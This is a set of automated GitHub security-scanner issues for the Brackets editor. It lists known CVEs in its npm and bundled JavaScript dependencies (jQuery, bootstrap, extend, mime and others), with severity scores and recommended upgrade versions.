ssri 5.2.2-8.0.0, fixed in 8.0.1, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.

Publish Date: 2021-03-12

URL: CVE-2021-27290

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: GHSA-vx3p-948g-6vhq

Release Date: 2021-03-12

Fix Resolution (ssri): 6.0.2

Direct dependency fix Resolution (npm): 6.14.7



DepShield encountered errors while building your project

The project could not be analyzed because of build errors. Please review the error messages here. Another build will be scheduled when a change to a manifest file* occurs. If the build is successful this issue will be closed, otherwise the error message will be updated.

This is an automated GitHub Issue created by Sonatype DepShield. GitHub Apps, including DepShield, can be managed from the Developer settings of the repository administrators.

* Supported manifest files are: pom.xml, package.json, package-lock.json, npm-shrinkwrap.json, Cargo.lock, Cargo.toml, main.rs, lib.rs, build.gradle, build.gradle.kts, settings.gradle, settings.gradle.kts, gradle.properties, gradle-wrapper.properties, go.mod, go.sum

CVE-2018-3737 (High) detected in sshpk-1.13.1.tgz - autoclosed

CVE-2018-3737 - High Severity Vulnerability

Vulnerable Library - sshpk-1.13.1.tgz

A library for finding and using SSH public keys

Library home page: https://registry.npmjs.org/sshpk/-/sshpk-1.13.1.tgz

Path to dependency file: brackets/src/package.json

Path to vulnerable library: brackets/src/node_modules/sshpk/package.json

Dependency Hierarchy:

  • less-2.7.2.tgz (Root Library)
    • request-2.81.0.tgz
      • http-signature-1.1.1.tgz
        • sshpk-1.13.1.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

sshpk is vulnerable to ReDoS when parsing crafted invalid public keys.

Publish Date: 2018-06-07

URL: CVE-2018-3737

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://hackerone.com/reports/319593

Release Date: 2018-06-07

Fix Resolution: 1.13.2



CVE-2018-16492 (High) detected in extend-3.0.1.tgz - autoclosed

CVE-2018-16492 - High Severity Vulnerability

Vulnerable Library - extend-3.0.1.tgz

Port of jQuery.extend for node.js and the browser

Library home page: https://registry.npmjs.org/extend/-/extend-3.0.1.tgz

Path to dependency file: brackets/src/package.json

Path to vulnerable library: brackets/src/node_modules/extend/package.json

Dependency Hierarchy:

  • less-2.7.2.tgz (Root Library)
    • request-2.81.0.tgz
      • extend-3.0.1.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: master

Vulnerability Details

A prototype pollution vulnerability was found in module extend <2.0.2, ~<3.0.2 that allows an attacker to inject arbitrary properties onto Object.prototype.

Publish Date: 2019-02-01

URL: CVE-2018-16492

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://hackerone.com/reports/381185

Release Date: 2019-02-01

Fix Resolution: extend - v3.0.2,v2.0.2



CVE-2020-11022 (Medium) detected in jquery-2.1.3.min.js, jquery-1.7.1.min.js

CVE-2020-11022 - Medium Severity Vulnerability

Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js

jquery-2.1.3.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js

Path to dependency file: /test/SpecRunner.html

Path to vulnerable library: /test/../src/thirdparty/jquery-2.1.3.min.js,/src/thirdparty/jquery-2.1.3.min.js

Dependency Hierarchy:

  • jquery-2.1.3.min.js (Vulnerable Library)

jquery-1.7.1.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js

Path to dependency file: /src/LiveDevelopment/Inspector/inspector.html

Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html

Dependency Hierarchy:

  • jquery-1.7.1.min.js (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

Publish Date: 2020-04-29

URL: CVE-2020-11022

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11022

Release Date: 2020-04-29

Fix Resolution: jQuery - 3.5.0



CVE-2020-11022 (Medium) detected in jquery-2.1.3.min.js, jquery-1.7.1.min.js - autoclosed

CVE-2020-11022 - Medium Severity Vulnerability

Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js

jquery-2.1.3.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js

Path to dependency file: brackets/src/index.html

Path to vulnerable library: /src/thirdparty/jquery-2.1.3.min.js,/test/../src/thirdparty/jquery-2.1.3.min.js

Dependency Hierarchy:

  • jquery-2.1.3.min.js (Vulnerable Library)

jquery-1.7.1.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js

Path to dependency file: brackets/src/LiveDevelopment/Inspector/inspector.html

Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html

Dependency Hierarchy:

  • jquery-1.7.1.min.js (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

Publish Date: 2020-04-29

URL: CVE-2020-11022

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/

Release Date: 2020-04-29

Fix Resolution: jQuery - 3.5.0



CVE-2020-7788 (High) detected in ini-1.3.5.tgz - autoclosed

CVE-2020-7788 - High Severity Vulnerability

Vulnerable Library - ini-1.3.5.tgz

An ini encoder/decoder for node

Library home page: https://registry.npmjs.org/ini/-/ini-1.3.5.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/npm/node_modules/ini/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • ini-1.3.5.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Publish Date: 2020-12-11

URL: CVE-2020-7788

CVSS 3 Score Details (7.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788

Release Date: 2020-12-11

Fix Resolution: v1.3.6



CVE-2016-1000232 (Medium) detected in tough-cookie-2.2.2.tgz - autoclosed

CVE-2016-1000232 - Medium Severity Vulnerability

Vulnerable Library - tough-cookie-2.2.2.tgz

RFC6265 Cookies and Cookie Jar for node.js

Library home page: https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.2.2.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/phantomjs/node_modules/tough-cookie/package.json

Dependency Hierarchy:

  • phantomjs-2.1.1.tgz (Root Library)
    • request-2.67.0.tgz
      • tough-cookie-2.2.2.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: master

Vulnerability Details

NodeJS Tough-Cookie version 2.2.2 contains a Regular Expression Parsing vulnerability in HTTP request Cookie header parsing that can result in Denial of Service. This attack appears to be exploitable via a custom HTTP header passed by a client. This vulnerability appears to have been fixed in 2.3.0.

Publish Date: 2018-09-05

URL: CVE-2016-1000232

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://www.npmjs.com/advisories/130

Release Date: 2018-09-05

Fix Resolution: 2.3.0



CVE-2020-7660 (High) detected in serialize-javascript-1.9.1.tgz - autoclosed

CVE-2020-7660 - High Severity Vulnerability

Vulnerable Library - serialize-javascript-1.9.1.tgz

Serialize JavaScript to a superset of JSON that includes regular expressions and functions.

Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/serialize-javascript/package.json

Dependency Hierarchy:

  • webpack-4.0.0.tgz (Root Library)
    • uglifyjs-webpack-plugin-1.3.0.tgz
      • serialize-javascript-1.9.1.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: master

Vulnerability Details

serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function "deleteFunctions" within "index.js".

Publish Date: 2020-06-01

URL: CVE-2020-7660

CVSS 3 Score Details (8.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7660

Release Date: 2020-06-01

Fix Resolution: serialize-javascript - 3.1.0



CVE-2018-1000620 (Critical) detected in cryptiles-0.2.2.tgz, cryptiles-2.0.5.tgz

CVE-2018-1000620 - Critical Severity Vulnerability

Vulnerable Libraries - cryptiles-0.2.2.tgz, cryptiles-2.0.5.tgz

cryptiles-0.2.2.tgz

General purpose crypto utilities

Library home page: https://registry.npmjs.org/cryptiles/-/cryptiles-0.2.2.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/phantomjs/node_modules/cryptiles/package.json

Dependency Hierarchy:

  • phantomjs-1.9.18.tgz (Root Library)
    • request-2.42.0.tgz
      • hawk-1.1.1.tgz
        • cryptiles-0.2.2.tgz (Vulnerable Library)

cryptiles-2.0.5.tgz

General purpose crypto utilities

Library home page: https://registry.npmjs.org/cryptiles/-/cryptiles-2.0.5.tgz

Path to dependency file: /src/package.json

Path to vulnerable library: /src/node_modules/cryptiles/package.json,/node_modules/cryptiles/package.json

Dependency Hierarchy:

  • request-2.79.0.tgz (Root Library)
    • hawk-3.1.3.tgz
      • cryptiles-2.0.5.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

Eran Hammer's cryptiles, version 4.1.1 and earlier, contains a CWE-331: Insufficient Entropy vulnerability in the randomDigits() method. As a result, an attacker is more likely to be able to brute force a value that was supposed to be random. Exploitability depends upon the calling application. This vulnerability appears to have been fixed in 4.1.2.

Publish Date: 2018-07-09

URL: CVE-2018-1000620

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1000620

Release Date: 2018-07-09

Fix Resolution (cryptiles): 4.1.2

Direct dependency fix Resolution (request): 2.82.0



CVE-2018-21270 (Medium) detected in stringstream-0.0.5.tgz

CVE-2018-21270 - Medium Severity Vulnerability

Vulnerable Library - stringstream-0.0.5.tgz

Encode and decode streams into string streams

Library home page: https://registry.npmjs.org/stringstream/-/stringstream-0.0.5.tgz

Path to dependency file: /src/package.json

Path to vulnerable library: /src/node_modules/stringstream/package.json

Dependency Hierarchy:

  • less-2.7.2.tgz (Root Library)
    • request-2.81.0.tgz
      • stringstream-0.0.5.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

Versions less than 0.0.6 of the Node.js stringstream module are vulnerable to an out-of-bounds read because of allocation of uninitialized buffers when a number is passed in the input stream (when using Node.js 4.x).

Publish Date: 2020-12-03

URL: CVE-2018-21270

CVSS 3 Score Details (6.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-21270

Release Date: 2020-12-03

Fix Resolution (stringstream): 0.0.6

Direct dependency fix Resolution (less): 2.7.3



CVE-2019-8331 (Medium) detected in bootstrap-2.0.3.min.js

CVE-2019-8331 - Medium Severity Vulnerability

Vulnerable Library - bootstrap-2.0.3.min.js

The most popular front-end framework for developing responsive, mobile first projects on the web.

Library home page: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/2.0.3/bootstrap.min.js

Path to dependency file: /test/SpecRunner.html

Path to vulnerable library: /test/thirdparty/bootstrap2/js/bootstrap.min.js

Dependency Hierarchy:

  • bootstrap-2.0.3.min.js (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute.

Publish Date: 2019-02-20

URL: CVE-2019-8331

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2019-02-20

Fix Resolution: bootstrap - 3.4.1,4.3.1;bootstrap-sass - 3.4.1,4.3.1



CVE-2018-20676 (Medium) detected in bootstrap-2.0.3.min.js

CVE-2018-20676 - Medium Severity Vulnerability

Vulnerable Library - bootstrap-2.0.3.min.js

The most popular front-end framework for developing responsive, mobile first projects on the web.

Library home page: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/2.0.3/bootstrap.min.js

Path to dependency file: /test/SpecRunner.html

Path to vulnerable library: /test/thirdparty/bootstrap2/js/bootstrap.min.js

Dependency Hierarchy:

  • bootstrap-2.0.3.min.js (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute.

Publish Date: 2019-01-09

URL: CVE-2018-20676

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20676

Release Date: 2019-01-09

Fix Resolution: bootstrap - 3.4.0



CVE-2020-11023 (Medium) detected in jquery-2.1.3.min.js, jquery-1.7.1.min.js

CVE-2020-11023 - Medium Severity Vulnerability

Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js

jquery-2.1.3.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js

Path to dependency file: /test/SpecRunner.html

Path to vulnerable library: /test/../src/thirdparty/jquery-2.1.3.min.js,/src/thirdparty/jquery-2.1.3.min.js

Dependency Hierarchy:

  • jquery-2.1.3.min.js (Vulnerable Library)

jquery-1.7.1.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js

Path to dependency file: /src/LiveDevelopment/Inspector/inspector.html

Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html

Dependency Hierarchy:

  • jquery-1.7.1.min.js (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

Publish Date: 2020-04-29

URL: CVE-2020-11023

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://github.com/jquery/jquery/security/advisories/GHSA-jpcq-cgw6-v4j6,https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440

Release Date: 2020-04-29

Fix Resolution: jquery - 3.5.0;jquery-rails - 4.4.0



WS-2015-0033 (High) detected in uglify-js-1.0.7.tgz - autoclosed

WS-2015-0033 - High Severity Vulnerability

Vulnerable Library - uglify-js-1.0.7.tgz

Library home page: https://registry.npmjs.org/uglify-js/-/uglify-js-1.0.7.tgz

Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json

Path to vulnerable library: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/uglify-js/package.json

Dependency Hierarchy:

  • grunt-0.3.9.tgz (Root Library)
    • uglify-js-1.0.7.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

uglifier incorrectly handles non-boolean comparisons during minification. The upstream library for the Ruby uglifier gem, UglifyJS, is affected by a vulnerability that allows a specially crafted JavaScript file to have altered functionality after minification. This bug, found in UglifyJS versions 2.4.23 and earlier, was demonstrated to allow potentially malicious code to be hidden within otherwise benign code and activated by the minification process.

Publish Date: 2015-07-22

URL: WS-2015-0033

CVSS 3 Score Details (7.2)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://hakiri.io/technologies/uglifier/issues/279911d9720338

Release Date: 2020-06-07

Fix Resolution: Uglifier - 2.7.2;uglify-js - v2.4.24



CVE-2020-7656 (Medium) detected in jquery-1.7.1.min.js

CVE-2020-7656 - Medium Severity Vulnerability

Vulnerable Library - jquery-1.7.1.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js

Path to dependency file: /src/LiveDevelopment/Inspector/inspector.html

Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html

Dependency Hierarchy:

  • jquery-1.7.1.min.js (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

jquery prior to 1.9.0 allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove "<script>" HTML tags whose closing tag contains a whitespace character, i.e. "</script >", which results in the enclosed script logic being executed.

Publish Date: 2020-05-19

URL: CVE-2020-7656

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-q4m3-2j7h-f7xw

Release Date: 2020-05-19

Fix Resolution: jquery - 1.9.0



CVE-2017-16138 (High) detected in mime-1.2.11.tgz, mime-1.4.0.tgz

CVE-2017-16138 - High Severity Vulnerability

Vulnerable Libraries - mime-1.2.11.tgz, mime-1.4.0.tgz

mime-1.2.11.tgz

A comprehensive library for mime-type mapping

Library home page: https://registry.npmjs.org/mime/-/mime-1.2.11.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/mime/package.json

Dependency Hierarchy:

  • grunt-contrib-less-1.4.0.tgz (Root Library)
    • less-2.7.3.tgz
      • mime-1.2.11.tgz (Vulnerable Library)

mime-1.4.0.tgz

A comprehensive library for mime-type mapping

Library home page: https://registry.npmjs.org/mime/-/mime-1.4.0.tgz

Path to dependency file: /src/package.json

Path to vulnerable library: /src/node_modules/mime/package.json

Dependency Hierarchy:

  • less-2.7.2.tgz (Root Library)
    • mime-1.4.0.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

The mime module < 1.4.1, 2.0.1, 2.0.2 is vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.

Publish Date: 2018-06-07

URL: CVE-2017-16138

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16138

Release Date: 2018-04-26

Fix Resolution (mime): 1.4.1

Direct dependency fix Resolution (grunt-contrib-less): 1.4.1

Fix Resolution (mime): 1.4.1

Direct dependency fix Resolution (less): 2.7.3


